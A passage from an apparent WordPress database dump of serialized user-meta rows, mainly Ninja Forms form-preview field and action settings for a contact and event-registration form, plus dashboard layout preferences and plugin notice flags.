left\";s:10:\"manual_key\";s:0:\"\";s:13:\"disable_input\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:28:\"disable_browser_autocomplete\";s:0:\"\";s:12:\"textarea_rte\";s:0:\"\";s:18:\"disable_rte_mobile\";s:0:\"\";s:14:\"textarea_media\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3284\";s:11:\"field_label\";s:7:\"Message\";s:9:\"field_key\";s:7:\"message\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}}i:300;a:1:{s:8:\"settings\";a:71:{s:5:\"label\";s:6:\"Submit\";s:3:\"key\";s:6:\"submit\";s:9:\"parent_id\";s:2:\"33\";s:4:\"type\";s:6:\"submit\";s:10:\"created_at\";s:19:\"2016-08-24 16:39:20\";s:16:\"processing_label\";s:10:\"Processing\";s:5:\"order\";i:5;s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:28:\"wrap_styles_background-color\";s:0:\"\";s:18:\"wrap_styles_border\";s:0:\"\";s:24:\"wrap_styles_border-style\";s:0:\"\";s:24:\"wrap_styles_border-color\";s:0:\"\";s:17:\"wrap_styles_color\";s:0:\"\";s:18:\"wrap_styles_height\";s:0:\"\";s:17:\"wrap_styles_width\";s:0:\"\";s:21:\"wrap_styles_font-size\";s:0:\"\";s:18:\"wrap_styles_margin\";s:0:\"\";s:19:\"wrap_styles_padding\";s:0:\"\";s:19:\"wrap_styles_display\";s:0:\"\";s:17:\"wrap_styles_float\";s:0:\"\";s:29:\"wrap_styles_show_advanced_css\";s:1:\"0\";s:20:\"wrap_styles_advanced\";s:0:\"\";s:29:\"label_styles_background-color\";s:0:\"\";s:19:\"label_styles_border\";s:0:\"\";s:25:\"label_styles_border-style\";s:0:\"\";s:25:\"label_styles_border-color\";s:0:\"\";s:18:\"label_styles_color\";s:0:\"\";s:19:\"label_styles_height\";s:0:\"\";s:18:\"label_styles_width\";s:0:\"\";s:22:\"label_styles_font-size\";s:0:\"\";s:19:\"label_styles_margin\";s:0:\"\";s:20:\"label_styles_padding\";s:0:\"\";s:20:\"label_styles_display\";s:0:\"\";s:18:\"label_styles_float\";s:0:\"\";s:30:\"label_styles_show_advanced_css\";s:1:\"0\";s:21:\"label_styles_advanced\";s:0:\"\";s:31:\"element_styles_background-color\";s:0:\"\";s:21:\"element_styles_border\";s:0:\"\";s:27:\"element_styles_border-style\";s:0:\"\";s:27:\"element_styles_border-color\";s:0:\"\";s:20:\"element_styles_color\";s:0:\"\";s:21:\"element_styles_height\";s:0:\"\";s:20:\"element_styles_width\";s:0:\"\";s:24:\"element_styles_font-size\";s:0:\"\";s:21:\"element_styles_margin\";s:0:\"\";s:22:\"element_styles_padding\";s:0:\"\";s:22:\"element_styles_display\";s:0:\"\";s:20:\"element_styles_float\";s:0:\"\";s:32:\"element_styles_show_advanced_css\";s:1:\"0\";s:23:\"element_styles_advanced\";s:0:\"\";s:44:\"submit_element_hover_styles_background-color\";s:0:\"\";s:34:\"submit_element_hover_styles_border\";s:0:\"\";s:40:\"submit_element_hover_styles_border-style\";s:0:\"\";s:40:\"submit_element_hover_styles_border-color\";s:0:\"\";s:33:\"submit_element_hover_styles_color\";s:0:\"\";s:34:\"submit_element_hover_styles_height\";s:0:\"\";s:33:\"submit_element_hover_styles_width\";s:0:\"\";s:37:\"submit_element_hover_styles_font-size\";s:0:\"\";s:34:\"submit_element_hover_styles_margin\";s:0:\"\";s:35:\"submit_element_hover_styles_padding\";s:0:\"\";s:35:\"submit_element_hover_styles_display\";s:0:\"\";s:33:\"submit_element_hover_styles_float\";s:0:\"\";s:45:\"submit_element_hover_styles_show_advanced_css\";s:1:\"0\";s:36:\"submit_element_hover_styles_advanced\";s:0:\"\";s:7:\"cellcid\";s:5:\"c3287\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:6:\"submit\";}}s:5:\"tmp-2\";a:1:{s:8:\"settings\";a:15:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:5:\"label\";s:13:\"Checkbox List\";s:4:\"type\";s:12:\"listcheckbox\";s:3:\"key\";s:26:\"listcheckbox_1596492165694\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";b:0;s:7:\"options\";a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}}s:5:\"tmp-1\";a:1:{s:8:\"settings\";a:14:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:4:\"type\";s:12:\"listcheckbox\";s:5:\"label\";s:13:\"Checkbox List\";s:3:\"key\";s:26:\"listcheckbox_1596492159677\";s:9:\"label_pos\";s:7:\"default\";s:8:\"required\";b:0;s:7:\"options\";a:3:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:11:\"admin_label\";s:0:\"\";s:9:\"help_text\";s:0:\"\";}}}s:7:\"actions\";a:4:{i:129;a:1:{s:8:\"settings\";a:32:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-24 16:39:20\";s:5:\"label\";s:16:\"Store Submission\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"parent_id\";s:2:\"33\";s:7:\"message\";s:170:\"This action adds users to WordPress&#039; personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site&#039;s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";i:0;s:16:\"subs_expire_time\";s:2:\"90\";}}i:130;a:1:{s:8:\"settings\";a:27:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-24 16:39:20\";s:5:\"label\";s:18:\"Email Confirmation\";s:2:\"to\";s:13:\"{field:email}\";s:7:\"subject\";s:24:\"This is an email action.\";s:7:\"message\";s:19:\"Hello, Ninja Forms!\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:0:{}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:13:\"email_subject\";s:24:\"Submission Confirmation \";s:13:\"email_message\";s:29:\"<p>{all_fields_table}<br></p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"parent_id\";s:2:\"33\";}}i:131;a:1:{s:8:\"settings\";a:26:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-24 16:47:39\";s:5:\"label\";s:18:\"Email Notification\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:20:\"{system:admin_email}\";s:13:\"email_subject\";s:29:\"New message from {field:name}\";s:13:\"email_message\";s:60:\"<p>{field:message}</p><p>-{field:name} ( {field:email} )</p>\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:13:\"{field:email}\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:1:\"0\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"parent_id\";s:2:\"33\";s:7:\"message\";s:170:\"This action adds users to WordPress&#039; personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site&#039;s front end.\";}}i:132;a:1:{s:8:\"settings\";a:33:{s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2016-08-24 16:39:20\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:47:\"Thank you {field:name} for filling out my form!\";s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:8:\"reply_to\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:10:\"attach_csv\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:89:\"<p>Form submitted successfully.</p><p>A confirmation email was sent to {field:email}.</p>\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"parent_id\";s:2:\"33\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";i:0;s:16:\"subs_expire_time\";s:2:\"90\";}}}}'),(640,2,'wpforms_dismissed','a:1:{s:15:\"lite-notice-bar\";i:1596492353;}'),(789,2,'cf_pointer_add_element','a:1:{i:0;N;}'),(796,2,'caldera_forms_activation_ignore_notice','true'),(832,2,'manageedit-nf_subcolumnshidden-form-37','a:0:{}'),(982,2,'meta-box-order_dashboard','a:4:{s:6:\"normal\";s:112:\"boldgrid-notifications,dashboard_activity,mec_widget_news_features,dashboard_right_now,mec_widget_total_bookings\";s:4:\"side\";s:115:\"boldgrid_news_widget,dashboard_quick_press,dashboard_primary,dashboard_site_health,wp_mail_smtp_reports_widget_lite\";s:7:\"column3\";s:32:\"wordfence_activity_report_widget\";s:7:\"column4\";s:0:\"\";}'),(1018,2,'rtec_registrations_view_type','grid'),(1019,2,'meta-box-order_tribe_events','a:3:{s:4:\"side\";s:86:\"submitdiv,tagsdiv-post_tag,tribe_events_catdiv,tribe_events_event_options,postimagediv\";s:6:\"normal\";s:99:\"revisionsdiv,tribe_events_event_details,rtec-event-details,postexcerpt,postcustom,slugdiv,authordiv\";s:8:\"advanced\";s:0:\"\";}'),(1020,2,'screen_layout_tribe_events','2'),(1146,2,'meta-box-order_page','a:3:{s:4:\"side\";s:98:\"submitdiv,pageparentdiv,passster,nf_admin_metaboxes_appendaform,postimagediv,wpXSG-meta,ao_metabox\";s:6:\"normal\";s:86:\"scripts-to-footer,slugdiv,authordiv,wpcode-metabox-snippets,butterbean-ui-boldgrid_seo\";s:8:\"advanced\";s:0:\"\";}'),(1147,2,'screen_layout_page','2'),(1376,2,'user_last_view_date','20231011205937'),(1377,2,'user_last_view_date_events','20231117115056'),(1378,2,'mec_op','a:0:{}'),(1502,2,'closedpostboxes_mec_calendars','a:1:{i:0;s:24:\"mec_calendar_search_form\";}'),(1503,2,'metaboxhidden_mec_calendars','a:2:{i:0;s:24:\"mec_calendar_search_form\";i:1;s:7:\"slugdiv\";}'),(1548,2,'wpcl_nf_form_preview_45','a:4:{s:2:\"id\";i:45;s:8:\"settings\";a:34:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:44:\"Sound of Soul Event Registration-SIZED SMALL\";s:10:\"created_at\";s:19:\"2021-04-18 18:46:01\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:20:\"repeatable_fieldsets\";s:0:\"\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:15:\"formContentData\";a:4:{i:0;s:9:\"firstname\";i:1;s:8:\"lastname\";i:2;s:5:\"email\";i:3;s:20:\"submit_1618628929218\";}s:12:\"calculations\";a:0:{}s:13:\"sub_limit_msg\";s:0:\"\";s:3:\"key\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:10:\"add_submit\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";}s:6:\"fields\";a:4:{i:417;a:1:{s:8